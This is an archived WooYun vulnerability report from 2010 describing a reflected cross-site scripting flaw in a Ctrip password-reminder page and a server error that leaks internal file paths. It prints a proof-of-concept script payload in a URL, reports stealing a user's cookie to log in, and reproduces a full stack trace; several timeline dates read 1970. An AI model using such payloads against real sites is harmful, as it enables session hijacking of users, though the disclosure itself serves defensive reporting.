当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-063

漏洞标题:携程网跨站弱点及物理路径泄漏

相关厂商:携程旅行网

漏洞作者: Liscker

提交时间:2010-07-22 18:07

修复时间:2010-08-21 21:00

公开时间:2010-08-21 21:00

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-07-22: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-21: 细节向公众公开

简要描述:

携程网某页面存在跨站弱点,可导致攻击者窃取用户cookie仿冒用户登录。且存在物理路径泄漏问题。

详细说明:

http://www.ctrip.com/Member/RemindPWD.asp?email=&uid=&signin_logintype=&done=
此处存在跨站,可窃取用户cookie。我模拟行为窃取某用户的cookie后使用该cookie成功登录携程。
在仿冒cookie的过程中,引起了aspx的服务器错误,导致物理路径泄漏。

漏洞证明:

1.xss http://www.ctrip.com/Member/RemindPWD.asp?email=&uid=&signin_logintype=&done=">%3Cscript%3Ealert%28/document.cookie/%29%3C/script%3E
2.physical
“/myctrip”应用程序中的服务器错误。
未将对象引用设置到对象的实例。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.NullReferenceException: 未将对象引用设置到对象的实例。
源错误:
执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。
堆栈跟踪:
[NullReferenceException: 未将对象引用设置到对象的实例。]
Ctrip.Common.Utility.UserAuth.CheckUserToken(String tokenString) in D:\CtripCode\SystemSolution\ADSystem\Ctrip.BaseFramework\BaseFramework\Utility\Utility\UserAuth.cs:32
Customer.MyCtrip.Presenter.BaseIPage.GetUserProfile() in a:\CtripSolution\Customer\MAINLINE\Customer\MyCtripSolution\PresenterLayer\Presenter\Customer.MyCtrip.Presenter\BaseClass\BaseIPage.cs:208
Customer.MyCtrip.Presenter.SecureBaseIPage.OnLoad(EventArgs e) in a:\CtripSolution\Customer\MAINLINE\Customer\MyCtripSolution\PresenterLayer\Presenter\Customer.MyCtrip.Presenter\BaseClass\SecureBaseIPage.cs:27
System.Web.UI.Control.LoadRecursive() +47
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1436

修复方案:

1、过滤关键字
2、设置cookie路径

版权声明:转载请注明来源 Liscker@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:3

确认时间:2010-07-22 18:07

厂商回复:

感谢感谢,正在修复中

最新状态:

暂无